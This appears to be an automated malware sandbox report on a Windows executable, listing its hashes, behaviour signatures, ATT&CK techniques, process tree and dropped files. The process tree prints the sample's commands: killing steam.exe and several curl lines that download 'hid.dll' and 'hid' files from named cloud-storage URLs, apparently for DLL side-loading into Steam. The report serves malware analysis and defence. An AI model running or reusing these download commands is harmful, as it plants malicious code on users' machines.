411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152

Analysis

max time kernel
149s
max time network
162s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
14/10/2023, 03:37

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe
Size

2.5MB
MD5

7a2183b5273bd4535902df2b9a81aaf2
SHA1

113e18fa736620d40b530c4819e19479e710a31e
SHA256

411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152
SHA512

8214f650690aeb241fe61325aea3693112c45c984c9f697bd53d9f5f4fe4849919abe1ceb8a2dad811da4e6b2479dbdf8a09e10a86b6dd6030e7847d0c2ee66e
SSDEEP

49152:nl/zHaDClhb7LbOUk3mk8wFpJVoUOwN5ZAi69itf0+UsaRq8k:hOGk8gOwiaf1jaRqZ

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation	411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Kills process with taskkill 1 IoCs

evasion

pid	Process
4392	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4632	411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe
4632	411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe
4632	411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe
4632	411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe
4632	411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe
4632	411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4392	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4976	OpenWith.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 4632 wrote to memory of 2344	4632	411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe	88
PID 4632 wrote to memory of 2344	4632	411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe	88
PID 2344 wrote to memory of 4392	2344	cmd.exe	90
PID 2344 wrote to memory of 4392	2344	cmd.exe	90
PID 4632 wrote to memory of 936	4632	411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe	91
PID 4632 wrote to memory of 936	4632	411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe	91
PID 936 wrote to memory of 4428	936	cmd.exe	93
PID 936 wrote to memory of 4428	936	cmd.exe	93
PID 4632 wrote to memory of 2500	4632	411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe	95
PID 4632 wrote to memory of 2500	4632	411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe	95
PID 2500 wrote to memory of 1040	2500	cmd.exe	96
PID 2500 wrote to memory of 1040	2500	cmd.exe	96
PID 4632 wrote to memory of 1536	4632	411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe	97
PID 4632 wrote to memory of 1536	4632	411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe	97
PID 1536 wrote to memory of 2020	1536	cmd.exe	98
PID 1536 wrote to memory of 2020	1536	cmd.exe	98
PID 4632 wrote to memory of 4872	4632	411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe	99
PID 4632 wrote to memory of 4872	4632	411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe	99
PID 4872 wrote to memory of 5012	4872	cmd.exe	100
PID 4872 wrote to memory of 5012	4872	cmd.exe	100
PID 4632 wrote to memory of 464	4632	411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe	101
PID 4632 wrote to memory of 464	4632	411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe	101
PID 464 wrote to memory of 3012	464	cmd.exe	102
PID 464 wrote to memory of 3012	464	cmd.exe	102
PID 4632 wrote to memory of 4336	4632	411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe	103
PID 4632 wrote to memory of 4336	4632	411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe	103
PID 4336 wrote to memory of 1432	4336	cmd.exe	104
PID 4336 wrote to memory of 1432	4336	cmd.exe	104
PID 4632 wrote to memory of 5100	4632	411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe	105
PID 4632 wrote to memory of 5100	4632	411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe	105

C:\Users\Admin\AppData\Local\Temp\411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe
"C:\Users\Admin\AppData\Local\Temp\411c7f9c40fe03e7ab7319d2fd32174478572c8e74b1c925cc65a31aaddc7152.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4632
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c TASKKILL /F /IM "steam.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2344
- - C:\Windows\system32\taskkill.exe
    TASKKILL /F /IM "steam.exe"
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\curl -o "\hid.dll" "http://stconfig.oss-accelerate-overseas.aliyuncs.com/ndwf/H"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:936
- - C:\Windows\System32\curl.exe
    C:\Windows\System32\curl -o "\hid.dll" "http://stconfig.oss-accelerate-overseas.aliyuncs.com/ndwf/H"
    3⤵
    PID:4428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\curl -o "\hid.dll" "http://stconfig.oss-accelerate.aliyuncs.com/ndwf/H"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2500
- - C:\Windows\System32\curl.exe
    C:\Windows\System32\curl -o "\hid.dll" "http://stconfig.oss-accelerate.aliyuncs.com/ndwf/H"
    3⤵
    PID:1040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\curl -o "\hid.dll" "http://stconfig.oss-cn-hongkong.aliyuncs.com/ndwf/H"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1536
- - C:\Windows\System32\curl.exe
    C:\Windows\System32\curl -o "\hid.dll" "http://stconfig.oss-cn-hongkong.aliyuncs.com/ndwf/H"
    3⤵
    PID:2020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\curl -o "C:\Users\Admin\AppData\Local\steamactive\hid" "http://stconfig.oss-accelerate-overseas.aliyuncs.com/ndwf/hid"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4872
- - C:\Windows\System32\curl.exe
    C:\Windows\System32\curl -o "C:\Users\Admin\AppData\Local\steamactive\hid" "http://stconfig.oss-accelerate-overseas.aliyuncs.com/ndwf/hid"
    3⤵
    PID:5012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\curl -o "C:\Users\Admin\AppData\Local\steamactive\hid" "http://stconfig.oss-accelerate.aliyuncs.com/ndwf/hid"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:464
- - C:\Windows\System32\curl.exe
    C:\Windows\System32\curl -o "C:\Users\Admin\AppData\Local\steamactive\hid" "http://stconfig.oss-accelerate.aliyuncs.com/ndwf/hid"
    3⤵
    PID:3012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\curl -o "C:\Users\Admin\AppData\Local\steamactive\hid" "http://stconfig.oss-cn-hongkong.aliyuncs.com/ndwf/hid"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4336
- - C:\Windows\System32\curl.exe
    C:\Windows\System32\curl -o "C:\Users\Admin\AppData\Local\steamactive\hid" "http://stconfig.oss-cn-hongkong.aliyuncs.com/ndwf/hid"
    3⤵
    PID:1432
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c Start steam://
  2⤵
  - Modifies registry class
  PID:5100

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4976

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\steamactive\hid

Filesize
281B

MD5
186daf42f5a6a309b219caf6c427385b

SHA1
5f6d6de5ceac80f6bece9598f41110181df5a07b

SHA256
7d1d43f420a4ac8388e8b2bfea3bec2d989b22277dbeca6a64b5b874d73cfddb

SHA512
9498f9fb1784ca16de9128a815a9d2c8c688e216e4c20144739b7360b19c2fa02beaa0c9072b2e10a13001ae2376e7f8def07de065836b6001fe3be4642e7e6e

Download Submit
C:\Users\Admin\AppData\Local\steamactive\hid

Filesize
272B

MD5
52779f8c98aa3c336a658a3ba2f2cbe9

SHA1
6c9748659e004c6ffe1ae07ad454894fd550bf18

SHA256
3f963e5592e0124210fc93995e53f2a16a159042a1d20b7f1cd10b2f11279889

SHA512
048bebbcc65e5ab058652aadf265a00d044dc4d5309218c8f03be0923b1910c52d6db76b7a0c730800f8c561cfe584cb8dbaa2faa1e3ddccf3c481a60fc9f5b9

Download Submit
C:\Users\Admin\AppData\Local\steamactive\hid

Filesize
393B

MD5
b8e86074ceb20ad19160d08f89acca12

SHA1
de721d8c170ecfcf7be9d127a0cf35852b07e9d8

SHA256
830704cc787a97de73644b6ae0065b8a40c5575a8ea09ab66f5f82c95d24c326

SHA512
7d6d276ce8b21710062fb49f63726527ee4d5b9e161ac38e79b84bd7e6e178f0d24ddae94d4ec592c0c17f8dea3c57b3ccb8c36105a864ec291422bfd4b7c2ba

Download Submit
C:\hid.dll

Filesize
281B

MD5
62de6ee5036ef42d35f4c738347ecbf1

SHA1
151d254faa490fabbea80c37fb063db0b0ded111

SHA256
3fb48dbfc6510de0854f3a03aea7f1aeb0d22daea7a6f8a2595b1b552eb0506d

SHA512
112102ba511e0483e3104dd0f9ac149271b295a51985211d71492872df7f8c893353b6b77695e9f6cfbfb3a4d2ab9c96c823209068dbb8b54dc35948d628bf02

Download Submit
C:\hid.dll

Filesize
393B

MD5
706dd172902b260d10eed5db6f7424e1

SHA1
18d88f2a322300af4e4aea8f0b9dae917bc578cf

SHA256
0cfa340947bab98c528ee4ae07e66817002ccc150c9ae500e2d65ac595b383f0

SHA512
1e385b5d30ffed01a2a6e5571aeb7a166cb68dc650d0a00b3c61061e3b01e7d03ba361db3078357a8beeab1b13e475d9304039b2f870db33b36daa747db2d827

Download Submit
C:\hid.dll

Filesize
272B

MD5
33299d1a27be3ea52f75bd04ada51cbf

SHA1
81975073fd2434be8eafd2f2478e3d8b3f8d275b

SHA256
5b0ae08a58822b4596262b03abe5b317d5df72db694c2126a4ff6b7105675e16

SHA512
7fc52334b2e96605fa4b84f617384e72bc6a81e31c47589f5f492d3b390d191f8a8e49c886e55a83fbcce31ba168736cc3f4251848701e0e950493323fc30bc8

Download Submit